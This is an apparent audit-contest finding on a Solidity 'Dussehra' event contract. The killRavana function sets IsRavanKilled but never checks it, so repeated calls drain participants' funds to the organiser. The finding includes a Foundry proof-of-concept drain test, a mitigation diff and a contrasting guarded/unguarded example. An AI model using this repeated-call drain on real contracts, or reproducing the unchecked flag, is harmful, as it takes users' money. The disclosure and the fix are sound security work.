Beginner FriendlyFoundryNFT
Submission Details
Severity: medium
Valid

`IsRavanKilled` in `Dussehra::KillRavana` is always true, which leads to malicious behavior or repeated execution of `Dussehra::KillRavana`


Description:

The `Dussehra::killRavana` function sets `IsRavanKilled` to `true` but never checks it, so the function can be executed more than once. This allows the organiser to act maliciously and take all of the event participants' money without any reward reaching the users who chose to be "Ram" (i.e., the participants). Even if the organiser is not malicious, `killRavana` has no access control, so once any participant calls it more than once the result is the same: the protocol's funds are drained and sent entirely to the organiser.

```solidity
function killRavana() public RamIsSelected {
    if (block.timestamp < 1728691069) {
        revert Dussehra__MahuratIsNotStart();
    }
    if (block.timestamp > 1728777669) {
        revert Dussehra__MahuratIsFinished();
    }
    IsRavanKilled = true;
    uint256 totalAmountByThePeople = WantToBeLikeRam.length * entranceFee;
    totalAmountGivenToRam = (totalAmountByThePeople * 50) / 100;
    (bool success, ) = organiser.call{value: totalAmountGivenToRam}("");
    require(success, "Failed to send money to organiser");
}
```

Impact:

  • Stolen Funds: By calling the function a second time, the organiser (or anyone) can transfer all of the collected funds to the organiser, leaving participants without their expected rewards. This is a financial loss for every user who contributed to the event.

  • Zero Payouts for Ram Participants: Because `totalAmountGivenToRam` is recomputed from the original pool on every call, the second call sends the half that was reserved for Ram to the organiser as well, so participants cannot withdraw their share; all of the funds intended for the users are taken.

Proof of Concept:
Use the following PoC in `Dussehra.t.sol`:

```solidity
//@author:nem0x001
function test_MalicousOrganizer() public participants {
    // The participants modifier enters 2 users with a fee of 1e18 each
    // 1- Choosing Ram
    vm.warp(1728691200 + 1);
    vm.startPrank(organiser);
    choosingRam.selectRamIfNotSelected();
    vm.stopPrank();

    // 2- Calling killRavana multiple times
    uint256 organiserIntialBalance = address(organiser).balance; // 0
    uint256 dussehraIntialBalance = address(dussehra).balance;   // 2e18, comes from the modifier

    vm.startPrank(player1);
    console.log("OrganizerIntialBalance :", address(organiser).balance);
    console.log("DussehraIntialBalance:", address(dussehra).balance);

    // First call
    dussehra.killRavana();

    console.log("OrganizerBalanceAfterFirstCall :", address(organiser).balance);
    console.log("DussehraBalanceAfterFirstCall:", address(dussehra).balance);

    // 50% goes to the organiser and 50% to Ram,
    // which in this case means 1e18 for the organiser
    // and the remaining 1e18 stays in the contract for Ram
    assert(address(organiser).balance == address(dussehra).balance);

    // Second call
    dussehra.killRavana();
    console.log("OrganizerBalanceAfterSecondCall :", address(organiser).balance);
    console.log("DussehraBalanceAfterSecondCall:", address(dussehra).balance);
    assertEq(address(dussehra).balance, 0);
    assertEq(address(organiser).balance, dussehraIntialBalance + organiserIntialBalance);

    vm.stopPrank();
}
```
**Recommended Mitigation:** Add a check on `IsRavanKilled` that prevents `killRavana` from being executed multiple times (the function currently has no such control):

```diff
+ error RavanaIsAlreadyKilled(); // custom error, declared with the contract's other errors

  function killRavana() public RamIsSelected {
      if (block.timestamp < 1728691069) {
          revert Dussehra__MahuratIsNotStart();
      }
      if (block.timestamp > 1728777669) {
          revert Dussehra__MahuratIsFinished();
      }
+     if (IsRavanKilled) {
+         revert RavanaIsAlreadyKilled();
+     }
      IsRavanKilled = true;
      uint256 totalAmountByThePeople = WantToBeLikeRam.length * entranceFee;
      totalAmountGivenToRam = (totalAmountByThePeople * 50) / 100;
      (bool success, ) = organiser.call{value: totalAmountGivenToRam}("");
      require(success, "Failed to send money to organiser");
  }
```
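As an added, self-contained illustration of both the finding and the mitigation (this is not the Dussehra project's code or the submitter's PoC): a stripped-down event contract that keeps only the accounting from `killRavana`, with a `guarded` switch that turns the recommended `IsRavanKilled` check on, and a Foundry test showing that the unguarded variant hands Ram's half to the organiser on the second call while the guarded variant reverts. All names here (`SimpleDussehra`, `enterPeopleWhoLikeRam`, `guarded`, the test contract) are assumed for the example.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

import {Test} from "forge-std/Test.sol";

// Added example, not the Dussehra project's code. SimpleDussehra keeps only the pieces of
// the event contract needed to show the finding: the payout is recomputed from the original
// pool on every call and the isRavanKilled flag is never consulted, so a second call moves
// the half reserved for Ram to the organiser as well. The `guarded` switch enables the
// one-line check from the recommended mitigation. All names here are assumed.
contract SimpleDussehra {
    error RavanaIsAlreadyKilled();

    address payable public immutable organiser;
    uint256 public immutable entranceFee;
    bool public immutable guarded;          // true = hardened variant
    address[] public wantToBeLikeRam;       // participants
    bool public isRavanKilled;
    uint256 public totalAmountGivenToRam;

    constructor(address payable _organiser, uint256 _entranceFee, bool _guarded) {
        organiser = _organiser;
        entranceFee = _entranceFee;
        guarded = _guarded;
    }

    function enterPeopleWhoLikeRam() external payable {
        require(msg.value == entranceFee, "wrong entrance fee");
        wantToBeLikeRam.push(msg.sender);
    }

    function killRavana() external {
        // Mitigation: refuse to run twice. Without this, every call below succeeds.
        if (guarded && isRavanKilled) revert RavanaIsAlreadyKilled();
        isRavanKilled = true;
        // Same accounting as the audited function: 50% of the ORIGINAL total, not of the
        // remaining balance, so a second call sends the other 50% to the organiser too.
        uint256 totalAmountByThePeople = wantToBeLikeRam.length * entranceFee;
        totalAmountGivenToRam = (totalAmountByThePeople * 50) / 100;
        (bool success, ) = organiser.call{value: totalAmountGivenToRam}("");
        require(success, "Failed to send money to organiser");
    }
}

contract SimpleDussehraTest is Test {
    uint256 constant FEE = 1 ether;
    address payable organiser;
    address player1;
    address player2;

    function setUp() public {
        organiser = payable(makeAddr("organiser"));
        player1 = makeAddr("player1");
        player2 = makeAddr("player2");
    }

    // Deploys one variant and enters two participants, so the pool holds 2 ether.
    function _deployWithTwoParticipants(bool guarded) internal returns (SimpleDussehra d) {
        d = new SimpleDussehra(organiser, FEE, guarded);
        vm.deal(player1, FEE);
        vm.deal(player2, FEE);
        vm.prank(player1);
        d.enterPeopleWhoLikeRam{value: FEE}();
        vm.prank(player2);
        d.enterPeopleWhoLikeRam{value: FEE}();
    }

    function test_UnguardedSecondCallDrainsRamShare() public {
        SimpleDussehra d = _deployWithTwoParticipants(false);
        vm.startPrank(player1);                  // any participant, no access control
        d.killRavana();
        assertEq(address(d).balance, 1 ether);   // half reserved for Ram
        assertEq(organiser.balance, 1 ether);
        d.killRavana();                          // flag is set but never checked
        vm.stopPrank();
        assertEq(address(d).balance, 0);         // Ram's half is gone
        assertEq(organiser.balance, 2 ether);
    }

    function test_GuardedSecondCallReverts() public {
        SimpleDussehra d = _deployWithTwoParticipants(true);
        vm.prank(player1);
        d.killRavana();
        vm.prank(player1);
        vm.expectRevert(SimpleDussehra.RavanaIsAlreadyKilled.selector);
        d.killRavana();
        assertEq(address(d).balance, 1 ether);   // Ram's share stays in the contract
        assertEq(organiser.balance, 1 ether);
    }
}
```

Run it with `forge test` in a project that has `forge-std` installed. The point the two tests make together is that the flag alone is not a guard: it only becomes one when it is read before any value is moved, which is exactly where the mitigation places the check.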
Updates

Lead Judging Commences

bube Lead Judge over 1 year ago
Submission Judgement Published
Validated
Assigned finding tags:

isRavanKilled is not checked
